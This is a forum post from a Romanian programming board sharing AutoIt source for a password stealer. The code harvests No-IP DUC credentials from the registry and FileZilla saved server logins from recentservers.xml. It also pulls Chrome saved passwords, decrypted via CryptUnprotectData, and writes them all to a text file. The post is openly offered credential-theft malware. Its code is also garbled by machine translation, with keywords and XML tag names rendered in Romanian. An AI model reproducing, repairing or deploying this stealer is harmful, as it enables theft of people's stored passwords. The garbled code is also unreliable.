Jump to content
io.kent

AutoIt Stealer Chrome / NOIP / FileZilla parola..

By io.kent, in Programare

Recommended Posts

io.kent Newbie

io.kent

Posted
Posted 
Cod (AutoIt):
# Comments-start
 + + + + + + + + + + + + Autoit stealer
 + + + + + + + + + Scriere de njq8;
 # Comments-end
 # Include <sqlite.au3>
 # Include <sqlite.dll.au3>

 $ File = @ SCRIPTDIR & "\ passwords.txt"
 dac? FileExists ( $ file ) , apoi FileDelete ( $ file )
 $ File_handle = FileOpen ( $ file , 1 )
 dac? $ file_handle <> - 1 atunci
 FileWrite ( $ file_handle , NOIP ( ) ?i Chrome ( ) & FileZilla ( ) )
 fileflush ( $ file_handle )
 FileClose ( $ file_handle )
 endif

 func NOIP ( )
 $ Usr = RegRead ( "HKEY_LOCAL_MACHINE \ Software \ vitalwer KS \ Duc" , "username" )
 dac? $ usr = "" , apoi reveni ""
 $ Pwd = RegRead ( "HKEY_LOCAL_MACHINE \ Software \ vitalwer KS \ Duc" , "parola" )
 reveni "URL: Http :/ / nu-ip.com /" & @ CRLF & "usr:" & $ usr & @ CRLF & "handicap (base64):" & $ pwd & @ CRLF & @ CRLF
 endfunc

 func FileZilla ( )
 locale PWDs $ , $ h , $ Fn = envget ( "AppData" ) & "\ FileZilla \ recentservers.xml"
 dac? FileExists ( $ Fn ) = false apoi întoarce ""
 $ H = FileOpen ( $ Fn , 0 )
 dac? $ H = - 1 , atunci întoarce ""
 $ Host = ""
 $ Port = 21
 Usr $ = ""
 Pass $ = ""
 în timp ce adev?rata
 $ Line = FileReadLine ( $ H )
 dac? @ error = - 1 , atunci exitloop
 dac? StringInStr ( $ line , "<gazd?>" ) , apoi
 Usr $ = ""
 Pass $ = ""
 $ Port = 21
 $ Host = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
 $ Host = StringMid ( $ host , StringInStr ( $ host , ">" ) + 1 )
 endif
 dac? StringInStr ( $ line , "<port>" ) , apoi
 $ Port = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
 $ Port = StringMid ( $ portul , StringInStr ( $ portul , ">" ) + 1 )
 endif
 dac? StringInStr ( $ line , "<utilizator>" ) , apoi
 $ Usr = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
 $ Usr = StringMid ( $ usr , StringInStr ( $ usr , ">" ) + 1 )
 endif
 dac? StringInStr ( $ line , "<pass>" ) , apoi
 Pass $ = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
 $ Pass = StringMid ( $ Pass , StringInStr ( $ Pass , ">" ) + 1 )
 endif
 dac? StringInStr ( $ line , "</ server>" ) , apoi
 $ PWDs = $ PWDs ?i "URL: FTP :/ /" & $ host & ":" & $ portul & @ CRLF & "usr:" & $ usr & @ CRLF & "PWD:" & $ Pass & @ CRLF & @ CRLF
 endif
 îndrepta
 reveni $ PWDs
 endfunc
 func Chrome ( )
 locale $ q , $ R , $ PWDs , $ Fn = envget ( "localappdata" ) & "\ Google \ Chrome \ Utilizator \ \ implicite de conectare de date"
 dac? FileExists ( $ Fn ) = false apoi întoarce ""
 _sqlite_startup ( )
 _sqlite_open ( $ Fn )
 _sqlite_query ( - 1 , "Select * de login," , $ q )
 în timp ce _sqlite_fetchdata ( $ q , $ R ) = 0
 $ PWDs = $ PWDs ?i "URL:" & $ R [ 0 ] & @ CRLF & "usr:" & $ R [ 3 ] & @ CRLF & "PWD:" & uncryptrdppassword ( $ R [ 5 ] ) & @ CRLF & @ CRLF
 îndrepta
 _sqlite_close ( )
 _sqlite_shutdown ( )
 reveni $ PWDs
 endfunc

 func uncryptrdppassword ( $ BIN )
 , Aceast? func?ie din >> http://www.autoitscript.com/forum/to...a/ # entry695769
 locale const $ cryptprotect_ui_forbidden = 0x1
 locale const $ data_blob = "int; ptr"

 locale $ passstr = dllstructcreate ( "byte [1024]" )
 locale $ datain = dllstructcreate ( $ data_blob )
 locale $ Dataout = dllstructcreate ( $ data_blob )
 $ Pwdescription = 'PSW "
 Pwdhash $ = ""

 dllstructsetdata ( $ Dataout , 1 , 0 )
 dllstructsetdata ( $ Dataout , 2 , 0 )

 dllstructsetdata ( $ passstr , 1 , $ BIN )
 dllstructsetdata ( $ datain , 2 , dllstructgetptr ( $ passstr , 1 ) )
 dllstructsetdata ( $ datain , 1 , binarylen ( $ BIN ) )

 $ Retur = DllCall ( "crypt32.dll" , "int" , "CryptUnprotectData" , _
 "Ptr" , dllstructgetptr ( $ datain ) , _
 "Ptr" , 0 , _
 "Ptr" , 0 , _
 "Ptr" , 0 , _
 "Ptr" , 0 , _
 "DWORD" , $ cryptprotect_ui_forbidden , _
 "Ptr" , dllstructgetptr ( $ Dataout ) )
 în cazul în care eroarea @ apoi întoarce ""

 $ Len = dllstructgetdata ( $ Dataout , 1 )
 $ Pwdhash = ptr ( dllstructgetdata ( $ Dataout , 2 ) )
 $ Pwdhash = dllstructcreate ( "byte [" & $ Len si "]" , $ pwdhash )
 reveni BinaryToString ( dllstructgetdata ( $ pwdhash , 1 ) , 4 )
 endfunc

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...